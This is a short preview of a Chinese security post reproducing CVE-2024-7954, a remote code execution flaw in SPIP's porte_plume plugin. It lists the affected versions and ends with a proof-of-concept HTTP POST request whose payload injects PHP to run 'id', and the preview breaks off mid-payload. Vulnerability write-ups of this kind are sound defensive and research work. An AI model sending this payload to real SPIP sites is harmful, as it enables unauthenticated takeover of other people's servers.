【成功复现】SPIP porte_plume远程代码执行漏洞(CVE-2024-7954)

文章预览

网安引领时代，弥天点亮未来       0x00写在前面       本次测试仅供学习使用，如若非法他用，与平台和本文作者无关，需自行负责！ 0x01漏洞介绍 SPIP是SPIP开源的一个用于创建 Internet 站点的免费软件。 SPIP存在安全漏洞，该漏洞源于容易受到任意代码执行漏洞的影响，远程未经身份验证的攻击者可以通过发送精心设计的HTTP请求以SPIP用户身份执行任意PHP。 0x02影响版本 影响产品及版本 1、 SPIP 4.3.0-alpha < 4.3.0-alpha2  2、 SPIP 4.2.x < 4.2.13  3、 SPIP 4.1.x < 4.1.16 0x03漏洞复现 1.访问漏洞环境 2.对漏洞进行复现   POC  漏洞复现 POST /index.php?action=porte_plume_previsu HTTP/1.1 Host: 127.0.0.1 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Content-Length: 77 data=AA_[ ->URL` "id" );?>` ………………………………